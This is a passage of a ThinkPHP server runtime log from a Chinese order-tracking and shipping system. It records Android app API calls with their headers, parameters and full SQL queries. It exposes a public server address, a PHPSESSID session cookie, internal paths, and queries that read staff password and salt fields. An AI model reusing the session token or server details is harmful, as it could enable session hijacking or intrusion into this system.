`ot_orderinfo` [ RunTime:0.000946s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000677s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 10,10 [ RunTime:0.023255s ] --------------------------------------------------------------- [ 2025-12-14T16:38:27+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018951s][吞吐率:52.77req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001168s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:28+08:00 ] 39.144.91.198 POST /api/kuguan/order/postSendAmountById?userId=24&orderId=53632&sendamount=21 [ info ] 47.105.33.115:8081/api/kuguan/order/postSendAmountById?userId=24&orderId=53632&sendamount=21 [运行时间:0.048053s][吞吐率:20.81req/s] [内存消耗:4,766.04kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001147s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'postSendAmountById', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '24', 'orderId' => '53632', 'sendamount' => '21', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001512s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->postSendAmountById[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000486s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000878s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000346s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000700s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000689s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `orderinfo`.`kehu_id`=`kehu`.`id` WHERE `orderinfo`.`id` = '53632' AND ( orderinfo.order_status!= '6' ) LIMIT 1 [ RunTime:0.000614s ] [ sql ] [ SQL ] UPDATE `ot_orderinfo` SET `send_amount`=21,`updatetime`=1765701508 WHERE `id` = 53632 [ RunTime:0.005122s ] --------------------------------------------------------------- [ 2025-12-14T16:38:28+08:00 ] 39.144.91.198 POST /api/order/getFahuoDanListById?userId=24 [ info ] 47.105.33.115:8081/api/order/getFahuoDanListById?userId=24 [运行时间:0.081664s][吞吐率:12.25req/s] [内存消耗:5,442.05kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001472s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getFahuoDanListById', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '24', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001675s ] [ info ] [ RUN ] app\api\controller\Order->getFahuoDanListById[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000444s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001002s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000992s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000505s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001188s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000712s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000701s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `orderinfo`.`kehu_id`=`kehu`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.send_amount > 0 and orderinfo.kehu_id != 0 ) ORDER BY `orderinfo`.`updatetime` DESC [ RunTime:0.021747s ] --------------------------------------------------------------- [ 2025-12-14T16:38:28+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [运行时间:0.085045s][吞吐率:11.76req/s] [内存消耗:5,464.64kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001187s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001542s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000422s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000916s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000730s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000417s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001089s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000700s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.030476s ] --------------------------------------------------------------- [ 2025-12-14T16:38:28+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=1&pageNum=10 [运行时间:0.078531s][吞吐率:12.73req/s] [内存消耗:5,456.40kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001147s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002158s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000503s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000829s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000672s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000415s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001009s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000769s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 10,10 [ RunTime:0.024836s ] --------------------------------------------------------------- [ 2025-12-14T16:38:30+08:00 ] 39.144.91.198 POST /api/kuguan/outbound/fahuobyid?staff_id=24&orderIdStr=53632 [ info ] 47.105.33.115:8081/api/kuguan/outbound/fahuobyid?staff_id=24&orderIdStr=53632 [运行时间:0.061159s][吞吐率:16.35req/s] [内存消耗:4,896.88kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001109s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.outbound', 2 => 'fahuobyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderIdStr' => '53632', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001464s ] [ info ] [ RUN ] app\api\controller\kuguan\Outbound->fahuobyid[ /alidata/www/gendan/application/api/controller/kuguan/Outbound.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000525s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000814s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000359s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000916s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE ( id in (53632) ) GROUP BY `kehu_id` [ RunTime:0.000513s ] [ sql ] [ SQL ] SELECT sum(send_amount) as totalsend,productinfo_id FROM `ot_orderinfo` WHERE ( id in (53632) ) GROUP BY `productinfo_id` [ RunTime:0.000264s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001216s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 554 LIMIT 1 [ RunTime:0.000433s ] [ sql ] [ SQL ] SELECT 